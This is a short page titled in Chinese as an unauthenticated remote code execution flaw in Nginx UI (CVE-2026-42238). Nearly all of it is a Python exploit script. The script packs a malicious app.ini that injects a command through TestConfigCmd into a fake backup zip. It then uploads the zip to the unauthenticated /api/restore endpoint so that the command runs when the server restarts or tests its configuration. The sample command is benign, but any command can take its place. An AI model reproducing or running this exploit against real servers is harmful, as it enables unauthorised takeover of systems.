CVE-2026-42238 Nginx UI未授权RCE漏洞

import requests import zipfile import io # Target URL target_url = "http://target-ip:port" # 1. Create malicious app.ini content with command injection malicious_config = """[server] TestConfigCmd = touch /tmp/pwned """ # 2. Create a zip file mimicking a backup zip_buffer = io.BytesIO() with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zipf: zipf.writestr('app.ini', malicious_config) zip_buffer.seek(0) # 3. Upload the malicious backup (Exploits the unauthenticated endpoint) restore_url = f"{target_url}/api/restore" files = {'file': ('backup.zip', zip_buffer, 'application/zip')} print("[*] Uploading malicious backup...") r = requests.post(restore_url, files=files) if r.status_code == 200: print("[+] Backup uploaded successfully. Waiting for restart or triggering configuration test...") # Note: The application restarts automatically or the attacker waits. # After restart, a request to any endpoint triggering config test executes the command. else: print("[-] Upload failed.")